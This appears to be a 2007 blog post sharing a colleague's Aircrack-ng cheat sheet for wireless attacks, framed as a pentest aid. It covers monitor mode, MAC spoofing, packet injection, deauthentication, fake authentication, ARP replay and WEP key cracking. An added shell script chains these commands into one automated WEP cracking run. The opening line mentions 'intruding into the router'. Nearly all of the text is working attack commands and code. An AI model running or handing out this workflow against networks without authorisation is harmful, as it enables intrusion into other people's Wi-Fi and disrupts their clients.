One day after intruding into the router, I remembered my colleague Mark had compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and managed to capture the commands needed when doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands; it comes in very handy when doing a wireless audit and saves you the time needed to read manuals. Use it in your next wireless audit. Thank you Mark for the compilation and your effort.
--------------------------------------------------------------------
install madwifi-ng driver (done! monitor mode working)
install rt73 driver for D-Link USB (done! monitor mode working)
install RutilT for rausb0 configuration
install aircrack-ng (done, dev version from svn)
Steps:
#####################################################
CONFIGURATION:
D-Link DWL-G122 (rt73 driver, interface rausb0)
ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor OR
airmon-ng start rausb0 <channel>
NetGear WG511T (madwifi-ng, interface ath0)
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
specify channel:
iwconfig ath0 channel <n>
########################################################
CHANGING MAC ADDRESS
ifconfig ath0 down
ifconfig ath0 hw ether <new-mac>
ifconfig ath0 up
or use macchanger instead
#########################################################
INJECTION TESTING
NetGear WG511T
aireplay-ng -9 ath0
===================
D-Link DWL-G122
aireplay-ng -9 rausb0 (if this doesn't work it means no AP on the same channel was found)
Try card-to-card injection below:
====================
Card-To-Card Injection:
Make sure both cards are on the same channel using
iwlist <interface> channel
aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================
########################################################
PACKET CAPTURE:
airodump-ng <interface> (find out first the BSSID and channel of interest)
Then capture packets on that particular channel only:
airodump-ng --channel <n> --bssid <bssid> -w <prefix> <interface>
Notes: capture full packets when using the PTW attack (don't dump IVs only with --ivs)
MERGING capture files (RESUMING)
mergecap -w out.cap test1.cap test2.cap test3.cap
FOR IVS
use ivstools: ivstools --merge test1.ivs test2.ivs out.ivs
############################################################
ATTACKS
You may want to associate to the AP first using fake authentication before any test:
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0 <interface>
Automatic Association (re-authenticate every 6000 s, one packet set per attempt, keep-alive every 10 s):
aireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0
ARP replay (for WEP cracking, PTW method):
if RXQ in the airodump window is > 90 then expect #/s = 200+ (watch #Data, each data frame carries an IV)
aireplay-ng --arpreplay -b <bssid> -h <your-mac> <interface>
Deauthentication (to capture a WPA handshake or reveal a hidden SSID):
aireplay-ng --deauth 1 -a <bssid> -c <client-mac> <interface>
Fake Authentication (to authenticate to the AP in case needed before we can inject): see --fakeauth above
#############################################################
WEP CRACKING
Using the PTW attack (aircrack-ng 0.9+ only). Packets must be ARP (from arp-replay):
aircrack-ng -z -b <bssid> <capturefile>
Approximate IVs needed:
40-bit = 20,000
104-bit = 40,000
Normal (FMS/KoreK statistical) attack:
-n 64 (test if 40-bit WEP); remove -n for 104-bit (default)
aircrack-ng -n 64 -a 1 capturefile
#########################################################
RESOLVE MAC Address to IP Address
use netdiscover or ARP tools
##########################################################
Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.
#######################################################
Increasing injection Speed
iwconfig <device> rate 11M
#####################################################
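The steps above (set the channel, test injection, run a focused capture, fake-authenticate, ARP-replay, crack with PTW) glued into one script, as an added example; it is not part of the original post or of Aircrack-ng. It assumes aircrack-ng 0.9 or later (for -z), a card already in monitor mode, and a first airodump-ng scan whose CSV file (written next to the .cap when airodump-ng is given -w) is read to find the target's BSSID, channel and IV count. The interface name ath0, the ESSIDs and MAC addresses, the DRY_RUN variable and all function names are placeholders chosen here; the CSV used when testing it is constructed to mirror airodump-ng's column layout.

```shell
#!/bin/sh
# Added worked example, not from the original post or from Aircrack-ng itself.
# Glues the cheat-sheet commands into one WEP/PTW audit flow.
# Assumptions (not stated on the page): aircrack-ng 0.9+ (for -z), the card is
# already in monitor mode, and a first airodump-ng scan has produced a CSV
# (the "-w <prefix>" output) from which the target's BSSID and channel are read.
# Interface names, ESSIDs, MACs and the DRY_RUN variable are placeholders.
set -u

# 2.4 GHz centre frequency: 2407 + 5*n MHz for channels 1-13, 2484 MHz for channel 14.
channel_to_mhz() {
    case "$1" in
        14) echo 2484 ;;
        [1-9]|1[0-3]) echo $((2407 + 5 * $1)) ;;
        *) echo "channel $1 is not a 2.4 GHz channel" >&2; return 1 ;;
    esac
}

# Rough IV counts the PTW attack needs, per key length in bits (figures from the sheet).
ptw_ivs_needed() {
    case "$1" in
        64) echo 20000 ;;
        128) echo 40000 ;;
        *) echo "unknown WEP key length: $1" >&2; return 1 ;;
    esac
}

valid_mac() {
    printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Print "BSSID CHANNEL IVS PRIVACY" for one ESSID from an airodump-ng CSV.
# The AP table comes first; the client table starts at the "Station MAC" header.
# Columns: 1 BSSID, 4 channel, 6 Privacy, 11 "# IV", 14 ESSID.
find_target_in_csv() {
    awk -F', *' -v essid="$2" '
        /^Station MAC/ { exit }
        /^BSSID/ || NF < 14 { next }
        {
            gsub(/ +$/, "", $14); gsub(/ +/, "", $6)
            if ($14 == essid) { print $1, $4 + 0, $11 + 0, $6; found = 1; exit }
        }
        END { exit found ? 0 : 1 }' "$1"
}

# With DRY_RUN set, commands are printed instead of executed, so the flow can be reviewed first.
run()   { if [ -n "${DRY_RUN:-}" ]; then printf '%s\n' "$*"; else "$@"; fi; }
spawn() { if [ -n "${DRY_RUN:-}" ]; then printf '%s &\n' "$*"; else "$@" & BG="${BG:-} $!"; fi; }

# usage: wep_ptw_audit <monitor-iface> <scan.csv> <essid> <our-mac> <capture-prefix>
wep_ptw_audit() {
    iface=$1 csv=$2 essid=$3 ourmac=$4 prefix=$5 BG=
    valid_mac "$ourmac" || { echo "bad MAC: $ourmac" >&2; return 1; }
    target=$(find_target_in_csv "$csv" "$essid") || { echo "'$essid' not found in $csv" >&2; return 1; }
    set -- $target          # word-split the "BSSID CHANNEL IVS PRIVACY" line
    bssid=$1 chan=$2 ivs=$3 priv=$4
    [ "$priv" = WEP ] || { echo "$essid uses $priv, not WEP; PTW does not apply" >&2; return 1; }
    echo "target $bssid on channel $chan ($(channel_to_mhz "$chan") MHz), $ivs IVs seen," \
         "about $(ptw_ivs_needed 128) needed for a 104-bit key"
    run iwconfig "$iface" channel "$chan"
    run aireplay-ng -9 "$iface"                 # injection test: check its output before continuing
    # Focused capture of full packets (not --ivs) on the target's channel and BSSID only.
    spawn airodump-ng --channel "$chan" --bssid "$bssid" -w "$prefix" "$iface"
    [ -n "${DRY_RUN:-}" ] || sleep 2
    # Keep-alive fake authentication, then ARP replay to generate fresh IVs.
    spawn aireplay-ng -1 6000 -o 1 -q 10 -e "$essid" -a "$bssid" -h "$ourmac" "$iface"
    spawn aireplay-ng -3 -b "$bssid" -h "$ourmac" "$iface"
    # PTW against the growing capture; airodump-ng names the first file <prefix>-01.cap.
    run aircrack-ng -z -b "$bssid" "$prefix"-01.cap
    status=$?
    [ -n "$BG" ] && kill $BG 2>/dev/null        # stop capture and replay once aircrack-ng returns
    return $status
}

if [ $# -eq 5 ]; then wep_ptw_audit "$@"; fi
```

Run it once with DRY_RUN set (for example `DRY_RUN=1 sh wepaudit.sh ath0 scan-01.csv teddy 00:09:5B:EC:EE:F2 wepcap`) to see the exact command lines it would issue; without DRY_RUN it backgrounds airodump-ng and both aireplay-ng instances and leaves aircrack-ng in the foreground, killing the background jobs when it exits.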
---------------------------------------------------------------------------
The Hacka Man
Wednesday, 31 October 2007
Hacking and Cracking Wireless
10.08
No comments